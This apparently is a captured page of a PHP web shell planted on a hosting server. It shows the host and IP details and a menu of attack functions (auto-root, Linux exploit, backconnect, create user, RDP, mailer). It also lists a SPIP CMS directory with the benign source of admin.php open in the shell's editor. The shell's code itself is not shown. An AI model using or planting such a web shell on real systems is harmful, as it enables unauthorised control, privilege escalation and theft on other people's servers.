Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
acces.php
13.5
KB
-rw----r--
actions.php
5.36
KB
-rw----r--
admin.php
9.46
KB
-rw----r--
auth.php
22.43
KB
-rw----r--
auth_handler.php
300
B
-rw-r--r--
autoriser.php
64.83
KB
-rw----r--
bandeau.php
8.42
KB
-rw----r--
boutons.php
2.49
KB
-rw----r--
charsets.php
28.17
KB
-rw----r--
chercher_logo.php
3.3
KB
-rw----r--
chercher_rubrique.php
11.33
KB
-rw----r--
commencer_page.php
4.49
KB
-rw----r--
completer_traduction.php
2.43
KB
-rw----r--
config.php
13.96
KB
-rw----r--
cookie.php
6.21
KB
-rw----r--
couleurs.php
3.24
KB
-rw----r--
csv.php
3.76
KB
-rw----r--
cvt_autosave.php
4.26
KB
-rw----r--
cvt_configurer.php
7.92
KB
-rw----r--
cvt_multietapes.php
10.15
KB
-rw----r--
definir_menus_favoris.php
1.08
KB
-rw----r--
distant.php
43.91
KB
-rw----r--
documents.php
8.84
KB
-rw----r--
drapeau_edition.php
6.82
KB
-rw----r--
editer.php
22.05
KB
-rw----r--
email_valide.php
1.74
KB
-rw----r--
envoyer_mail.php
7.67
KB
-rw----r--
exporter_csv.php
7.37
KB
-rw----r--
filtres.php
162.08
KB
-rw----r--
filtres_alertes.php
8.29
KB
-rw----r--
filtres_boites.php
4.79
KB
-rw----r--
filtres_dates.php
34.68
KB
-rw----r--
filtres_ecrire.php
17.33
KB
-rw----r--
filtres_images_lib_mini.php
59.89
KB
-rw----r--
filtres_images_mini.php
16.78
KB
-rw----r--
filtres_mime.php
4.72
KB
-rw----r--
filtres_mini.php
6.9
KB
-rw----r--
filtres_selecteur_generique.ph...
8.25
KB
-rw----r--
flock.php
20.88
KB
-rw----r--
genie.php
6.86
KB
-rw----r--
headers.php
7.77
KB
-rw----r--
icone_renommer.php
2.12
KB
-rw----r--
iconifier.php
1.37
KB
-rw----r--
importer_csv.php
4.8
KB
-rw----r--
index.php
2
B
-rw----r--
informer.php
2.95
KB
-rw----r--
install.php
15.69
KB
-rw----r--
invalideur.php
7.99
KB
-rw----r--
journal.php
1.11
KB
-rw----r--
json.php
2.2
KB
-rw----r--
lang.php
14.59
KB
-rw----r--
lang_liste.php
7.23
KB
-rw----r--
layer.php
5.93
KB
-rw----r--
lien.php
8.43
KB
-rw----r--
lien_court.php
1.17
KB
-rw----r--
liens.php
680
B
-rw----r--
lister_objets.php
2.13
KB
-rw----r--
livrer_fichier.php
7.7
KB
-rw----r--
log.php
3.43
KB
-rw----r--
math.php
4.42
KB
-rw----r--
meta.php
9.09
KB
-rw----r--
minipres.php
3.7
KB
-rw----r--
modeles.php
1.42
KB
-rw----r--
modifier.php
11.09
KB
-rw----r--
nfslock.php
11.47
KB
-rw----r--
notifications.php
5.76
KB
-rw----r--
pipelines.php
7.83
KB
-rw----r--
pipelines_ecrire.php
12.04
KB
-rw----r--
plonger.php
3.98
KB
-rw----r--
plugin.php
47.39
KB
-rw----r--
precharger_article.php
2.26
KB
-rw----r--
precharger_objet.php
7.2
KB
-rw----r--
prepare_recherche.php
5.72
KB
-rw----r--
preselectionner_parent_nouvel_...
2.19
KB
-rw----r--
presentation.php
8.63
KB
-rw----r--
presentation_mini.php
8.28
KB
-rw----r--
presenter_enfants.php
6.75
KB
-rw----r--
puce_statut.php
11.94
KB
-rw----r--
queue.php
20.62
KB
-rw----r--
recherche_to_array.php
8.15
KB
-rw----r--
rechercher.php
11.05
KB
-rw----r--
roles.php
12.12
KB
-rw----r--
rubriques.php
28.48
KB
-rw----r--
securiser_action.php
11.99
KB
-rw----r--
selectionner.php
5.27
KB
-rw----r--
session.php
21.59
KB
-rw----r--
simplexml_to_array.php
2.84
KB
-rw----r--
surligne.php
4.14
KB
-rw----r--
svg.php
19.55
KB
-rw----r--
texte.php
11.82
KB
-rw----r--
texte_mini.php
23.49
KB
-rw----r--
traduire.php
11.26
KB
-rw----r--
urls.php
11.05
KB
-rw----r--
utils.php
107.33
KB
-rw----r--
xml.php
7.47
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Gestion d'administration d'un SPIP * * @package SPIP\Core\Admin **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Teste qu'un utilisateur a des droits sur les fichiers du site et * exécute l'action (en base) demandée si c'est le cas. * * Demande / vérifie le droit de création de répertoire par le demandeur; * Mémorise dans les meta que ce script est en cours d'exécution. * Si elle y est déjà c'est qu'il y a eu suspension du script, on reprend. * * @uses debut_admin() * @uses admin_verifie_session() * @uses fin_admin() * * @param string $script * Script d'action (en base) à exécuter si on a des droits d'accès aux fichiers * @param string $titre * Titre de l'action demandée * @param string $comment * Commentaire supplémentaire * @param bool $anonymous * ? * @return string * Code HTML de la page (pour vérifier les droits), * sinon code HTML de la page après le traitement effectué. **/ function inc_admin_dist($script, $titre, $comment = '', $anonymous = false) { $reprise = true; if ( !isset($GLOBALS['meta'][$script]) or !isset($GLOBALS['meta']['admin']) ) { $reprise = false; $res = debut_admin($script, $titre, $comment); if ($res) { return $res; } spip_log("meta: $script " . print_r($_POST, true)); ecrire_meta($script, serialize($_POST)); } $res = admin_verifie_session($script, $anonymous); if ($res) { return $res; } $base = charger_fonction($script, 'base'); $base($titre, $reprise); fin_admin($script); return ''; } /** * Gestion dans la meta "admin" du script d'administation demandé, * pour éviter des exécutions en parallèle, notamment après Time-Out. * * Cette meta contient le nom du script et, à un hachage près, du demandeur. * Le code de ecrire/index.php dévie toute demande d'exécution d'un script * vers le script d'administration indiqué par cette meta si elle est là. * * Au niveau de la fonction inc_admin, on controle la meta 'admin'. * * - Si la meta n'est pas là, c'est le début on la crée. * - Sinon, si le hachage actuel est le même que celui en base, * c'est une reprise, on continue. * - Sinon, si le hachage diffère à cause du connect, c'est une arrivée * inoppotune, on refuse sa connexion. * - Enfin, si hachage diffère pour une autre raison, c'est que l'operation * se passe mal, on la stoppe * * @uses fichier_admin() * * @param string $script * Script d'action (en base) * @param bool $anonymous * ? * @return string * Code HTML si message d'erreur, '' sinon; */ function admin_verifie_session($script, $anonymous = false) { include_spip('base/abstract_sql'); $pref = sprintf('_%d_', $GLOBALS['visiteur_session']['id_auteur']); $signal = fichier_admin($script, "$script$pref"); $valeur = sql_getfetsel('valeur', 'spip_meta', "nom='admin'"); if ($valeur === null) { ecrire_meta('admin', $signal, 'non'); } else { if (!$anonymous and ($valeur != $signal)) { if ( !preg_match('/^(.*)_(\d+)_/', $GLOBALS['meta']['admin'], $l) or intval($l[2]) != $GLOBALS['visiteur_session']['id_auteur'] ) { include_spip('inc/minipres'); spip_log("refus de lancer $script, priorite a $valeur"); return minipres(_T('info_travaux_texte'), '', ['status' => 503]); } } } $journal = 'spip'; if (autoriser('configurer')) { // c'est une action webmestre, soit par ftp soit par statut webmestre $journal = 'webmestre'; } // on pourrait statuer automatiquement les webmestres a l'init d'une action auth par ftp ... ? spip_log("admin $pref" . ($valeur ? ' (reprise)' : ' (init)'), $journal); return ''; } /** * Retourne l'emplacement du répertoire où sera testé l'accès utilisateur * * Dans le répertoire temporaire si on est admin, sinon dans le répertoire * de transfert des admins restreints * * @return string * Chemin du répertoire. **/ function dir_admin() { if (autoriser('configurer')) { return _DIR_TMP; } else { return _DIR_TRANSFERT . $GLOBALS['visiteur_session']['login'] . '/'; } } /** * Retourne le nom d'un fichier de teste d'authentification par accès * aux fichiers * * Le nom calculé est un hash basé sur l’heure, l’action et l’auteur. * * @param string $action * Nom du script d'action (en base) * @param string $pref * Préfixe au nom du fichier calculé * @return string * Nom du fichier **/ function fichier_admin($action, $pref = 'admin_') { return $pref . substr(md5($action . (time() & ~2047) . $GLOBALS['visiteur_session']['login']), 0, 10); } /** * Demande la création d'un répertoire (pour tester l'accès de l'utilisateur) * et sort ou quitte sans rien faire si le répertoire est déjà là. * * Si l'on est webmestre, la plupart des actions n'ont pas besoin * de tester la création du répertoire (toutes sauf repair ou delete_all). * On considère qu'un webmestre a déjà du prouver ses droits sur les fichiers. * Dans ce cas, on quitte sans rien faire également. * * @uses dir_admin() * @uses fichier_admin() * * @param string $script * Script d'action (en base) à exécuter ensuite * @param string $action * Titre de l'action demandée * @param string $corps * Commentaire supplémentaire * @return string * Code HTML de la page (pour vérifier les droits), * sinon chaîne vide si déjà fait. **/ function debut_admin($script, $action = '', $corps = '') { if ((!$action) || !(autoriser('webmestre') or autoriser('chargerftp'))) { include_spip('inc/minipres'); return minipres(); } else { $dir = dir_admin(); $signal = fichier_admin($script); if (@file_exists($dir . $signal)) { spip_log("Action admin: $action"); return ''; } include_spip('inc/minipres'); // Si on est un super-admin, un bouton de validation suffit // sauf dans les cas destroy if ( (autoriser('webmestre') or $script === 'repair') and $script != 'delete_all' ) { if (_request('validation_admin') == $signal) { spip_log("Action super-admin: $action"); return ''; } $corps .= '<input type="hidden" name="validation_admin" value="' . $signal . '">'; $suivant = _T('bouton_valider'); $js = ''; } else { // cet appel permet d'assurer un copier-coller du nom du repertoire a creer dans tmp (esj) // l'insertion du script a cet endroit n'est pas xhtml licite // mais evite de l'embarquer dans toutes les pages minipres $corps .= http_script('', 'spip_barre.js'); $corps .= '<fieldset><legend>' . _T('info_authentification_ftp') . aider('ftp_auth') . "</legend>\n<label for='fichier'>" . _T('info_creer_repertoire') . "</label>\n" . "<span id='signal' class='formo'>" . $signal . '</span>' . "<input type='hidden' id='fichier' name='fichier' value='" . $signal . "'>" . _T('info_creer_repertoire_2', ['repertoire' => joli_repertoire($dir)]) . '</fieldset>'; $suivant = _T('bouton_recharger_page'); // code volontairement tordu: // provoquer la copie dans le presse papier du nom du repertoire // en remettant a vide le champ pour que ca marche aussi en cas // de JavaScript inactif. $js = " onload='var range=document.createRange(); var signal = document.getElementById(\"signal\"); var userSelection = window.getSelection(); range.setStart(signal,0); range.setEnd(signal,1); userSelection.addRange(range);'"; } // admin/xxx correspond // a exec/base_xxx de preference // et exec/xxx sinon (compat) if (tester_url_ecrire("base_$script")) { $script = "base_$script"; } $form = copy_request($script, $corps, $suivant); $info_action = _T('info_action', ['action' => "$action"]); return minipres($info_action, $form, ['onload' => $js]); } } /** * Clôture la phase d'administration en supprimant le répertoire * testant l'accès au fichiers ainsi que les metas d'exécution * * @param string $action * Nom de l'action (en base) qui a été exécutée **/ function fin_admin($action) { $signal = dir_admin() . fichier_admin($action); spip_unlink($signal); if ($action != 'delete_all') { effacer_meta($action); effacer_meta('admin'); spip_log("efface les meta admin et $action "); } } /** * Génère un formulaire avec les données postées * * Chaque donnée est mise en input hidden pour * les soumettre avec la validation du formulaire. * * @param string $script * Nom du script (pour l'espace privé) de destination * @param string $suite * Corps du formulaire * @param string $submit * texte du bouton de validation * @return string * Code HTML du formulaire **/ function copy_request($script, $suite, $submit = '') { include_spip('inc/filtres'); foreach (array_merge($_POST, $_GET) as $n => $c) { if (!in_array($n, ['fichier', 'exec', 'validation_admin']) and !is_array($c)) { $suite .= "\n<input type='hidden' name='" . spip_htmlspecialchars($n) . "' value='" . entites_html($c) . "' >"; } } return generer_form_ecrire($script, $suite, '', $submit); }
Close